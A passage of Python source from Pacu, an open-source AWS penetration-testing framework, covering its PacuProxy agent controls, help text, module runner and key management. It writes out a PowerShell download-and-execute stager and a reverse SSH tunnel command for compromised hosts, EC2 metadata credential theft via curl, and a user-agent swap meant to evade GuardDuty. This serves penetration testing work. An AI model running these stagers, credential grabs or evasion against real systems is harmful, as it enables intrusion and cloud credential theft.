self.print('SSH user setup successfully. It is highly recommended to restart your sshd service before continuing. Part of the SSH user creation process was to restrict access to local port forwarding, but this change requires an sshd restart. If local port forwarding is not disabled, your target machine can "hack back" by forwarding your local ports to their machine and accessing the services hosted on them. This can be done on most systems by running "service sshd restart".\n')
proxy_settings.update(self.database, ssh_username=proxy_ssh_username, ssh_password=proxy_ssh_password)
restart_sshd = self.input(' Do you want Pacu to restart sshd (Warning: If you are currently connected to your server over SSH, you may lose your connection)? Press enter if so, enter "ignore" to ignore this warning, or press Ctrl+C to exit and restart it yourself (Enter/ignore/Ctrl+C): ')
if restart_sshd == 'ignore':
pass
elif restart_sshd == '':
self.print('Restarting sshd...')
subprocess.run('service sshd restart', shell=True)
time.sleep(5)
self.print('Instructing remote agent to connect back...')
if proxy_target_agent[-1].startswith('Windows'):
self.print('Windows hosts not supported yet (coming soon!)')
return
secret_string = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=25))
class S(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Server', random.choice(['Apache', 'nginx'])) # Maybe make this perm per session or remove altogether
self.end_headers()
def do_GET(self):
self._set_headers()
if self.path == '/{}'.format(secret_string):
with open('pp_modules/powershell/reverse-socks.ps1', 'r') as f:
script = f.read().encode()
else:
script = b''
self.wfile.write(script)
return
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = (proxy_ip, port)
try:
httpd = server_class(server_address, handler_class)
except OSError as error:
if 'Cannot assign requested address' in str(error):
print('Failed to listen on http://{}:{}.'.format(proxy_ip, port))
print('Listening on http://0.0.0.0:{} instead...'.format(port))
server_address = ('0.0.0.0', port)
httpd = server_class(server_address, handler_class)
httpd.serve_forever()
t = threading.Thread(target=run, daemon=True)
t.start()
time.sleep(2)
# 1. Start a new thread
# 2. Start an HTTP server on it with the .ps1 file
# 3. Continue to send the connect_back_cmd
# 4. Kill HTTP server
# Download the script from the PacuProxy server
downloaded_string = "(New-Object System.Net.WebClient).DownloadString('http://{}:5051/{}')".format(proxy_ip, secret_string)
# Run Invoke-Expression on the downloaded script to import it to memory
invoke_expression = 'powershell iex({})'.format(downloaded_string)
# Execute the newly imported script to start the reverse proxy
start_proxy_cmd = 'Start-SocksProxy -sshhost {} -username {} -password {} -RemotePort 8001 -LocalPort 5050'.format(proxy_ip, proxy_ssh_username, proxy_ssh_password)
# Combine the commands into a one-liner
connect_back_cmd = '{}; {}'.format(invoke_expression, start_proxy_cmd)
else:
if shm_name == '':
shm_name = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=5))
# Create an in-memory file in /dev/shm that contains the password
create_shm = 'echo "echo {}" > /dev/shm/{}'.format(shm_name, shm_name)
# Give the file 777 permissions
add_permissions = 'chmod 777 /dev/shm/{}'.format(shm_name)
# DISPLAY=dummy to emulate a display
# SSH_ASKPASS=/dev/shm/{} to tell SSH that the file will echo it a password
# setsid to avoid any prompts
# Runs ssh to connect to the PacuProxy server over SSH while forwarding a port,
# without trying to open a shell, but keeping a persistent connection, and
# redirecting stderr to stdout (which then comes back to PacuProxy)
connect = 'DISPLAY=dummy SSH_ASKPASS=/dev/shm/{} setsid ssh -o UserKnownHostsFile=/dev/null -f -N -R 8001 -o StrictHostKeyChecking=no {}@{} >/dev/null 2>&1 &'.format(shm_name, proxy_ssh_username, proxy_ip)
# Combine the commands into a one-liner
connect_back_cmd = '{} && {} && {}'.format(create_shm, add_permissions, connect)
self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[int(command[2])], connect_back_cmd)
self.print('Remote agent instructed to connect!')
except Exception as error:
self.print('** Error: Invalid agent ID, expected an integer or "none": {} **'.format(error))
else:
self.print('** Error: Excepted an agent ID, received: {}'.format(command[2:]))
else:
self.print('** Unrecognized proxy command: {} **'.format(command[1]))
proxy_settings.update(self.database, ssh_username=proxy_ssh_username, ssh_password=proxy_ssh_password, ssh_shm_name=shm_name, listening=proxy_listening, target_agent=proxy_target_agent)
return
def parse_exec_module_command(self, command):
if len(command) > 1:
self.exec_module(command)
else:
print('The {} command requires a module name. Try using the module search function.'.format(command))
def parse_search_command(self, command):
if len(command) == 1:
self.list_modules('')
elif len(command) == 2:
self.list_modules(command[1])
elif len(command) >= 3:
if command[1] in ('cat', 'category'):
self.list_modules(command[2], by_category=True)
def display_pacu_help(self):
print("""
Pacu - https://github.com/RhinoSecurityLabs/pacu
Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/
This was built as a modular, open source tool to assist in penetration testing an AWS environment.
For usage and developer documentation, please visit the GitHub page.
Modules that have pre-requisites will have those listed in that modules help info, but if it is
executed before its pre-reqs have been filled, it will prompt you to run that module then continue
once that is finished, so you have the necessary data for the module you want to run.
Pacu command info:
list/ls List all modules
load_commands_file <file> Load an existing file with list of commands to execute
search [cat[egory]] <search term> Search the list of available modules by name or category
help Display this page of information
help <module name> Display information about a module
whoami Display information regarding to the active access keys
data Display all data that is stored in this session. Only fields
with values will be displayed
data <service>|proxy Display all data for a specified service or for PacuProxy
in this session
services Display a list of services that have collected data in the
current session to use with the "data" command
regions Display a list of all valid AWS regions
update_regions Run a script to update the regions database to the newest
version
set_regions <region> [<region>...] Set the default regions for this session. These space-separated
regions will be used for modules where regions are required,
but not supplied by the user. The default set of regions is
every supported region for the service. Supply "all" to this
command to reset the region set to the default of all
supported regions
run/exec <module name> Execute a module
set_keys Add a set of AWS keys to the session and set them as the
default
swap_keys Change the currently active AWS key to another key that has
previously been set for this session
import_keys <profile name>|--all Import AWS keys from the AWS CLI credentials file (located
at ~/.aws/credentials) to the current sessions database.
Enter the name of a profile you would like to import or
supply --all to import all the credentials in the file.
exit/quit Exit Pacu
Other command info:
aws <command> Run an AWS CLI command directly. Note: If Pacu detects "aws"
as the first word of the command, the whole command will
instead be run in a shell so that you can use the AWS CLI
from within Pacu. Due to the command running in a shell,
this enables you to pipe output where needed. An example
would be to run an AWS CLI command and pipe it into "jq"
to parse the data returned. Warning: The AWS CLI's
authentication is not related to Pacu. Be careful to
ensure that you are using the keys you want when using
the AWS CLI. It is suggested to use AWS CLI profiles
to solve this problem
[ADVANCED] PacuProxy command info:
proxy [help] Control PacuProxy/display help
start <ip> [port] Start the PacuProxy listener - port 80 by default.
The listener will attempt to start on the IP
supplied, but some hosts don't allow this. In
this case, PacuProxy will listen on 0.0.0.0 and
use the supplied IP to stage agents and it should
work the same
stop Stop the PacuProxy listener
kill <agent_id> Kill an agent (stop it from running on the host)
list/ls List info on remote agent(s)
use none|<agent_id> Use a remote agent, identified by unique integers
(use "proxy list" to see them). Choose "none" to
no longer use any proxy (route from the local
host instead)
shell <agent_id> <command> Run a shell command on the remote agent
fetch_ec2_keys <agent_id> Try to read the meta-data of the target agent to
request a set of temporary credentials for the
attached instance profile (if there is one),
then save them to the Pacu database and set
them as the active key pair
stager sh|ps Generate a PacuProxy stager. The "sh" format is
for *sh shells in Unix (like bash), and the "ps"
format is for PowerShell on Windows
""")
def display_proxy_help(self):
print("""
PacuProxy command info:
proxy [help] Control PacuProxy/display help
start <ip> [port] Start the PacuProxy listener - port 80 by default.
The listener will attempt to start on the IP
supplied, but some hosts don't allow this. In
this case, PacuProxy will listen on 0.0.0.0 and
use the supplied IP to stage agents and it should
work the same
stop Stop the PacuProxy listener
kill <agent_id> Kill an agent (stop it from running on the host)
list/ls List info on remote agent(s)
use none|<agent_id> Use a remote agent, identified by unique integers
(use "proxy list" to see them). Choose "none" to
no longer use any proxy (route from the local
host instead)
shell <agent_id> <command> Run a shell command on the remote agent
fetch_ec2_keys <agent_id> Try to read the meta-data of the target agent to
request a set of temporary credentials for the
attached instance profile (if there is one),
then save them to the Pacu database and set
them as the active key pair
stager sh|ps Generate a PacuProxy stager. The "sh" format is
for *sh shells in Unix (like bash), and the "ps"
format is for PowerShell on Windows
""")
def update_regions(self):
py_executable = sys.executable
# Update botocore to fetch the latest version of the AWS region_list
try:
self.print(' Fetching latest botocore...\n')
subprocess.run([py_executable, '-m', 'pip', 'install', '--upgrade', 'botocore'])
except:
pip = self.input(' Could not use pip3 or pip to update botocore to the latest version. Enter the name of your pip binary to continue: ').strip()
subprocess.run(['{}'.format(pip), 'install', '--upgrade', 'botocore'])
path = ''
try:
self.print(' Using pip3 to locate botocore...\n')
output = subprocess.check_output('{} -m pip show botocore'.format(py_executable), shell=True)
except:
path = self.input(' Could not use pip to determine botocore\'s location. Enter the path to your Python "dist-packages" folder (example: /usr/local/bin/python3.6/lib/dist-packages): ').strip()
if path == '':
# Account for Windows \r and \\ in file path (Windows)
rows = output.decode('utf-8').replace('\r', '').replace('\\\\', '/').split('\n')
for row in rows:
if row.startswith('Location: '):
path = row.split('Location: ')[1]
with open('{}/botocore/data/endpoints.json'.format(path), 'r+') as regions_file:
endpoints = json.load(regions_file)
for partition in endpoints['partitions']:
if partition['partition'] == 'aws':
regions = dict()
regions['all'] = list(partition['regions'].keys())
for service in partition['services']:
regions[service] = partition['services'][service]
with open('modules/service_regions.json', 'w+') as services_file:
json.dump(regions, services_file, default=str, sort_keys=True)
self.print(' Region list updated to the latest version!')
def import_module_by_name(self, module_name, include=()):
file_path = os.path.join(os.getcwd(), 'modules', module_name, 'main.py')
if os.path.exists(file_path):
import_path = 'modules.{}.main'.format(module_name).replace('/', '.').replace('\\', '.')
module = __import__(import_path, globals(), locals(), include, 0)
importlib.reload(module)
return module
return None
def all_region_prompt(self):
print('Automatically targeting regions:')
for region in self.get_regions('all'):
print(' {}'.format(region))
response = input('Continue? (y/n) ')
if response.lower() == 'y':
return True
else:
return False
###### Some module notes
# For any argument that needs a value and a region for that value, use the form
# value@region
# Arguments that accept multiple values should be comma separated.
######
def exec_module(self, command):
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
# Run key checks so that if no keys have been set, Pacu doesn't default to
# the AWSCLI default profile:
if not session.access_key_id:
print(' No access key has been set. Not running module.')
return
if not session.secret_access_key:
print(' No secret key has been set. Not running module.')
return
module_name = command[1].lower()
module = self.import_module_by_name(module_name, include=['main', 'module_info', 'summary'])
if module is not None:
# Plaintext Command Log
self.print('{} ({}): {}'.format(session.access_key_id, time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime()), ' '.join(command).strip()), output='file', is_cmd=True)
## XML Command Log - Figure out how to auto convert to XML
# self.print('<command>{}</command>'.format(cmd), output_type='xml', output='file')
if proxy_settings.target_agent is None or proxy_settings.target_agent == []:
self.print(' Running module {}...'.format(module_name))
else:
self.print(' Running module {} on agent at {}...'.format(module_name, proxy_settings.target_agent[0]))
try:
args = module.parser.parse_args(command[2:])
if 'regions' in args and args.regions is None:
session = self.get_active_session()
if session.session_regions == ['all']:
if not self.all_region_prompt():
return
except SystemExit:
print(' Error: Invalid Arguments')
return
self.running_module_names.append(module.module_info['name'])
try:
summary_data = module.main(command[2:], self)
# If the module's return value is None, it exited early.
if summary_data is not None:
summary = module.summary(summary_data, self)
if len(summary) > 10000:
raise ValueError('The {} module\'s summary is too long ({} characters). Reduce it to 10000 characters or fewer.'.format(module.module_info['name'], len(summary)))
if not isinstance(summary, str):
raise TypeError(' The {} module\'s summary is {}-type instead of str. Make summary return a string.'.format(module.module_info['name'], type(summary)))
self.print('{} completed.\n'.format(module.module_info['name']))
self.print('MODULE SUMMARY:\n\n{}\n'.format(summary.strip('\n')))
except SystemExit as error:
exception_type, exception_value, tb = sys.exc_info()
if 'SIGINT called' in exception_value.args:
self.print('^C\nExiting the currently running module.')
else:
traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value))
session, global_data, local_data = self.get_data_from_traceback(tb)
self.log_error(
traceback_text,
exception_info='{}: {}\n\nPacu caught a SystemExit error. '.format(exception_type, exception_value),
session=session,
local_data=local_data,
global_data=global_data
)
finally:
self.running_module_names.pop()
elif module_name in self.COMMANDS:
print('Error: "{}" is the name of a Pacu command, not a module. Try using it without "run" or "exec" in front.'.format(module_name))
else:
print('Module not found. Is it spelled correctly? Try using the module search function.')
def display_command_help(self, command_name):
if command_name == 'proxy':
self.display_proxy_help()
elif command_name == 'list' or command_name == 'ls':
print('\n list/ls\n List all modules\n')
elif command_name == 'import_keys':
print('\n import_keys <profile name>|--all\n Import AWS keys from the AWS CLI credentials file (located at ~/.aws/credentials) to the current sessions database. Enter the name of a profile you would like to import or supply --all to import all the credentials in the file.\n')
elif command_name == 'aws':
print('\n aws <command>\n Use the AWS CLI directly. This command runs in your local shell to use the AWS CLI. Warning: The AWS CLI\'s authentication is not related to Pacu. Be careful to ensure that you are using the keys you want when using the AWS CLI. It is suggested to use AWS CLI profiles to help solve this problem\n')
elif command_name == 'search':
print('\n search [cat[egory]] <search term>\n Search the list of available modules by name or category\n')
elif command_name == 'help':
print('\n help\n Display information about all Pacu commands\n help <module name>\n Display information about a module\n')
elif command_name == 'whoami':
print('\n whoami\n Display information regarding to the active access keys\n')
elif command_name == 'data':
print('\n data\n Display all data that is stored in this session. Only fields with values will be displayed\n data <service>|proxy\n Display all data for a specified service or for PacuProxy in this session\n')
elif command_name == 'services':
print('\n services\n Display a list of services that have collected data in the current session to use with the "data"\n command\n')
elif command_name == 'regions':
print('\n regions\n Display a list of all valid AWS regions\n')
elif command_name == 'update_regions':
print('\n update_regions\n Run a script to update the regions database to the newest version\n')
elif command_name == 'set_regions':
print('\n set_regions <region> [<region>...]\n Set the default regions for this session. These space-separated regions will be used for modules where\n regions are required, but not supplied by the user. The default set of regions is every supported\n region for the service. Supply "all" to this command to reset the region set to the default of all\n supported regions\n')
elif command_name == 'run' or command_name == 'exec':
print('\n run/exec <module name>\n Execute a module\n')
elif command_name == 'set_keys':
print('\n set_keys\n Add a set of AWS keys to the session and set them as the default\n')
elif command_name == 'swap_keys':
print('\n swap_keys\n Change the currently active AWS key to another key that has previously been set for this session\n')
elif command_name == 'exit' or command_name == 'quit':
print('\n exit/quit\n Exit Pacu\n')
elif command_name == 'load_commands_file':
print('\n load_commands_file <commands_file>\n Load an existing file with a set of commands to execute')
else:
print('Command or module not found. Is it spelled correctly? Try using the module search function.')
return
def display_module_help(self, module_name):
module = self.import_module_by_name(module_name, include=['module_info', 'parser'])
if module is not None:
print('\n{} written by {}.\n'.format(module.module_info['name'], module.module_info['author']))
if 'prerequisite_modules' in module.module_info and len(module.module_info['prerequisite_modules']) > 0:
print('Prerequisite Module(s): {}\n'.format(module.module_info['prerequisite_modules']))
if 'external_dependencies' in module.module_info and len(module.module_info['external_dependencies']) > 0:
print('External dependencies: {}\n'.format(module.module_info['external_dependencies']))
parser_help = module.parser.format_help()
print(parser_help.replace(os.path.basename(__file__), 'run {}'.format(module.module_info['name']), 1))
return
else:
print('Command or module not found. Is it spelled correctly? Try using the module search function, or "help" to view a list of commands.')
return
def list_modules(self, search_term, by_category=False):
found_modules_by_category = dict()
current_directory = os.getcwd()
for root, directories, files in os.walk('{}/modules'.format(current_directory)):
modules_directory_path = os.path.realpath('{}/modules'.format(current_directory))
specific_module_directory = os.path.realpath(root)
# Skip any directories inside module directories.
if os.path.dirname(specific_module_directory) != modules_directory_path:
continue
# Skip the root directory.
elif modules_directory_path == specific_module_directory:
continue
module_name = os.path.basename(root)
for file in files:
if file == 'main.py':
# Make sure the format is correct
module_path = 'modules/{}/main'.format(module_name).replace('/', '.').replace('\\', '.')
# Import the help function from the module
module = __import__(module_path, globals(), locals(), ['module_info'], 0)
importlib.reload(module)
category = module.module_info['category']
services = module.module_info['services']
regions = []
for service in services:
regions += self.get_regions(service)
# Skip modules with no regions in the list of set regions.
if len(regions) == 0:
continue
# Searching for modules by category:
if by_category and search_term in category:
if category not in found_modules_by_category.keys():
found_modules_by_category[category] = list()
found_modules_by_category[category].append(' {}'.format(module_name))
if search_term:
found_modules_by_category[category].append(' {}\n'.format(module.module_info['one_liner']))
# Searching or listing modules without specifying a category:
elif not by_category and search_term in module_name:
if category not in found_modules_by_category.keys():
found_modules_by_category[category] = list()
found_modules_by_category[category].append(' {}'.format(module_name))
if search_term:
found_modules_by_category[category].append(' {}\n'.format(module.module_info['one_liner']))
if found_modules_by_category:
PRINT_ORDER = ['RECON_UNAUTH', 'ENUM', 'ESCALATE', 'LATERAL_MOVE', 'EXPLOIT', 'PERSIST', 'EXFIL', 'EVADE']
for category in PRINT_ORDER:
if category in found_modules_by_category:
search_results = '\n'.join(found_modules_by_category[category]).strip('\n')
print('\n[Category: {}]\n\n{}'.format(category, search_results))
else:
print('\nNo modules found.')
print()
def fetch_ec2_keys(self, target, conn):
instance_profile = self.server.run_cmd(target, conn, 'curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/', mute=True)
if not instance_profile == '' and 'not found' not in instance_profile:
keys = self.server.run_cmd(target, conn, 'curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{}'.format(instance_profile), mute=True)
if '"Code" : "Success",' in keys:
keys = json.loads(keys)
self.set_keys('Agent{}/{}'.format(target, time.strftime("%m-%d@%I-%M%p")), keys['AccessKeyId'], keys['SecretAccessKey'], keys['Token'])
self.print('Keys successfully fetched from agent {}\'s EC2 meta-data and set as the active key pair. They will expire at {}.\n'.format(target, keys["Expiration"]))
return
self.print('Failed to fetch AWS keys, target is either not an EC2 instance or it does not have a valid instance profile attached to it.\n')
return
def set_keys(self, key_alias=None, access_key_id=None, secret_access_key=None, session_token=None):
session = self.get_active_session()
# If key_alias is None, then it's being run normally from the command line (set_keys),
# otherwise it means it is set programmatically and we don't want any prompts if it is
# done programatically
if key_alias is None:
self.print('Setting AWS Keys...')
self.print('Press enter to keep the value currently stored.')
self.print('Enter the letter C to clear the value, rather than set it.')
self.print('If you enter an existing key_alias, that key\'s fields will be updated instead of added.\n')
# Key alias
if key_alias is None:
new_value = self.input('Key alias [{}]: '.format(session.key_alias))
else:
new_value = key_alias.strip()
self.print('Key alias [{}]: {}'.format(session.key_alias, new_value), output='file')
if str(new_value.strip().lower()) == 'c':
session.key_alias = None
elif str(new_value) != '':
session.key_alias = new_value.strip()
# Access key ID
if key_alias is None:
new_value = self.input('Access key ID [{}]: '.format(session.access_key_id))
else:
new_value = access_key_id
self.print('Access key ID [{}]: {}'.format(session.access_key_id, new_value), output='file')
if str(new_value.strip().lower()) == 'c':
session.access_key_id = None
elif str(new_value) != '':
session.access_key_id = new_value.strip()
# Secret access key (should not be entered in log files)
if key_alias is None:
if session.secret_access_key is None:
new_value = input('Secret access key [None]: ')
else:
new_value = input('Secret access key [{}{}]: '.format(session.secret_access_key[0:int(len(session.secret_access_key) / 2)], '*' * int(len(session.secret_access_key) / 2)))
else:
new_value = secret_access_key
self.print('Secret access key [******]: ****** (Censored)', output='file')
if str(new_value.strip().lower()) == 'c':
session.secret_access_key = None
elif str(new_value) != '':
session.secret_access_key = new_value.strip()
# Session token (optional)
if key_alias is None:
new_value = self.input('Session token (Optional - for temp AWS keys only) [{}]: '.format(session.session_token))
else:
new_value = session_token
if new_value is None:
new_value = 'c'
self.print('Session token [{}]: {}'.format(session.session_token, new_value), output='file')
if str(new_value.strip().lower()) == 'c':
session.session_token = None
elif str(new_value) != '':
session.session_token = new_value.strip()
self.database.add(session)
aws_key = session.get_active_aws_key(self.database)
if aws_key:
aws_key.key_alias = session.key_alias
aws_key.access_key_id = session.access_key_id
aws_key.secret_access_key = session.secret_access_key
aws_key.session_token = session.session_token
else:
aws_key = AWSKey(
session=session,
key_alias=session.key_alias,
access_key_id=session.access_key_id,
secret_access_key=session.secret_access_key,
session_token=session.session_token
)
self.database.add(aws_key)
self.database.commit()
if key_alias is None:
self.print('\nKeys saved to database.\n')
def swap_keys(self):
session = self.get_active_session()
aws_keys = session.aws_keys.all()
if not aws_keys:
self.print('\nNo AWS keys set for this session. Run "set_keys" to add AWS keys.\n')
return
self.print('\nSwapping AWS Keys. Press enter to keep the currently active key.')
print('AWS keys in this session:')
for index, aws_key in enumerate(aws_keys, 1):
if aws_key.key_alias == session.key_alias:
print(' [{}] {} (ACTIVE)'.format(index, aws_key.key_alias))
else:
print(' [{}] {}'.format(index, aws_key.key_alias))
choice = input('Choose an option: ')
if not str(choice).strip():
self.print('The currently active AWS key will remain active. ({})'.format(session.key_alias))
return
if not choice.isdigit() or int(choice) not in range(1, len(aws_keys) + 1):
print('Please choose a number from 1 to {}.'.format(len(aws_keys)))
return self.swap_keys()
chosen_key = aws_keys[int(choice) - 1]
session.key_alias = chosen_key.key_alias
session.access_key_id = chosen_key.access_key_id
session.secret_access_key = chosen_key.secret_access_key
session.session_token = chosen_key.session_token
self.database.add(session)
self.database.commit()
self.print('AWS key is now {}.'.format(session.key_alias))
def check_sessions(self):
sessions = self.database.query(PacuSession).all()
if not sessions:
session = self.new_session()
else:
print('Found existing sessions:')
print(' [0] New session')
for index, session in enumerate(sessions, 1):
print(' [{}] {}'.format(index, session.name))
choice = input('Choose an option: ')
try:
if int(choice) == 0:
session = self.new_session()
else:
session = sessions[int(choice) - 1]
except (ValueError, IndexError):
print('Please choose a number from 0 to {}.'.format(len(sessions)))
return self.check_sessions()
session.activate(self.database)
def new_session(self):
session_data = dict()
name = None
while not name:
name = input('What would you like to name this new session? ').strip()
if not name:
print('A session name is required.')
else:
existing_sessions = self.database.query(PacuSession).filter(PacuSession.name == name).all()
if existing_sessions:
print('A session with that name already exists.')
name = None
session_data['name'] = name
session = PacuSession(**session_data)
self.database.add(session)
self.database.commit()
session_downloads_directory = './sessions/{}/downloads/'.format(name)
if not os.path.exists(session_downloads_directory):
os.makedirs(session_downloads_directory)
print('Session {} created.'.format(name))
return session
def get_data_from_traceback(self, tb):
session = None
global_data_in_all_frames = list()
local_data_in_all_frames = list()
for frame, line_number in traceback.walk_tb(tb):
global_data_in_all_frames.append(str(frame.f_globals))
local_data_in_all_frames.append(str(frame.f_locals))
# Save the most recent PacuSession called "session", working backwards.
if session is None:
session = frame.f_locals.get('session', None)
if not isinstance(session, PacuSession):
session = None
return session, global_data_in_all_frames, local_data_in_all_frames
def check_user_agent(self):
session = self.get_active_session()
if session.boto_user_agent is None: # If there is no user agent set for this session already
boto3_session = boto3.session.Session()
ua = boto3_session._session.user_agent()
if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux
# GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that...
self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
with open('./user_agents.txt', 'r') as file:
user_agents = file.readlines()
user_agents = [agent.strip() for agent in user_agents] # Remove random \n's and spaces
new_ua = random.choice(user_agents)
session.update(self.database, boto_user_agent=new_ua)
self.print(' User agent for this session set to:')
self.print(' {}'.format(new_ua))
def get_boto3_client(self, service, region=None, user_agent=None, socks_port=8001, parameter_validation=True):
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
# If there is not a custom user_agent passed into this function
# and session.boto_user_agent is set, use that as the user agent
# for this client. If both are set, the incoming user_agent will
# override the session.boto_user_agent. If niether are set, it
# will be None, and will default to the OS's regular user agent
if user_agent is None and session.boto_user_agent is not None:
user_agent = session.boto_user_agent
boto_config = botocore.config.Config(
proxies={'https': 'socks5://127.0.0.1:{}'.format(socks_port), 'http': 'socks5://127.0.0.1:{}'.format(socks_port)} if not proxy_settings.target_agent == [] else None,
user_agent=user_agent, # If user_agent=None, botocore will use the real UA which is what we want
parameter_validation=parameter_validation
)
return boto3.client(
service,
region_name=region, # Whether region has a value or is None, it will work here
aws_access_key_id=session.access_key_id,
aws_secret_access_key=session.secret_access_key,
aws_session_token=session.session_token,
config=boto_config
)
def get_boto3_resource(self, service, region=None, user_agent=None, socks_port=8001, parameter_validation=True):
# All the comments from get_boto3_client apply here too
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
if user_agent is None and session.boto_user_agent is not None:
user_agent = session.boto_user_agent
boto_config = botocore.config.Config(
proxies={'https': 'socks5://127.0.0.1:{}'.format(socks_port), 'http': 'socks5://127.0.0.1:{}'.format(socks_port)} if not proxy_settings.target_agent == [] else None,
user_agent=user_agent,
parameter_validation=parameter_validation
)
return boto3.resource(
service,
region_name=region,
aws_access_key_id=session.access_key_id,
aws_secret_access_key=session.secret_access_key,
aws_session_token=session.session_token,
config=boto_config
)
def initialize_tab_completion(self):
try:
import readline
# Big thanks to samplebias: https://stackoverflow.com/a/5638688
MODULES = []
CATEGORIES = []
for root, directories, files in os.walk('{}/modules'.format(os.getcwd())):
modules_directory_path = os.path.realpath('{}/modules'.format(os.getcwd()))
category_path = os.path.realpath(root)
# Skip any directories inside module directories.
if os.path.dirname(category_path) != modules_directory_path:
continue
# Skip the root directory.
elif modules_directory_path == category_path:
continue
for file in files:
if file == 'main.py':
module_name = os.path.basename(root)
MODULES.append(module_name)
# Make sure the format is correct
module_path = 'modules/{}/main'.format(module_name).replace('/', '.').replace('\\', '.')
# Import the help function from the module
module = __import__(module_path, globals(), locals(), ['module_info'], 0)
importlib.reload(module)
CATEGORIES.append(module.module_info['category'])
RE_SPACE = re.compile('.*\s+$', re.M)
readline.set_completer_delims(' \t\n`~!@#$%^&*()=+[{]}\\|;:\'",<>/?')
class Completer(object):
def complete(completer, text, state):
buffer = readline.get_line_buffer()
line = readline.get_line_buffer().split()
# If nothing has been typed, show all commands. If help, exec, or run has been typed, show all modules
if not line:
return [c + ' ' for c in self.COMMANDS][state]
if len(line) == 1 and (line[0] == 'help'):
return [c + ' ' for c in MODULES + self.COMMANDS][state]
if len(line) == 1 and (line[0] == 'exec' or line[0] == 'run'):
return [c + ' ' for c in MODULES][state]
# account for last argument ending in a space
if RE_SPACE.match(buffer):
line.append('')
# Resolve command to the implementation function
if len(line) == 1:
cmd = line[0].strip()
results = [c + ' ' for c in self.COMMANDS if c.startswith(cmd)] + [None]
elif len(line) == 2:
cmd = line[1].strip()
if line[0].strip() == 'search':
results = [c + ' ' for c in MODULES + ['category'] if c.startswith(cmd)] + [None]
elif line[0].strip() == 'help':
results = [c + ' ' for c in MODULES + self.COMMANDS if c.startswith(cmd)] + [None]
else:
results = [c + ' ' for c in MODULES if c.startswith(cmd)] + [None]
elif len(line) == 3 and line[0] == 'search' and line[1] in ('cat', 'category'):
cmd = line[2].strip()
results = [c + ' ' for c in CATEGORIES if c.startswith(cmd)] + [None]
elif len(line) >= 3:
if line[0].strip() == 'run' or line[0].strip() == 'exec':
module_name = line[1].strip()
module = self.import_module_by_name(module_name, include=['module_info'])
autocomplete_arguments = module.module_info.get('arguments_to_autocomplete', list())
current_argument = line[-1].strip()
results = [c + ' ' for c in autocomplete_arguments if c.startswith(current_argument)] + [None]
return results[state]
comp = Completer()
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
except Exception as error:
# Error means most likely on Windows where readline is not supported
# TODO: Implement tab-completion for Windows
# print(error)
pass
def exit(self):
sys.exit('SIGINT called')
def idle(self):
session = self.get_active_session()
if session.key_alias:
alias = session.key_alias
else:
alias = 'No Keys Set'
command = input('Pacu ({}:{}) > '.format(session.name, alias))
self.parse_command(command)
self.idle()
def run(self):
idle_ready = False
while True:
try:
if not idle_ready:
try:
print("""
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀
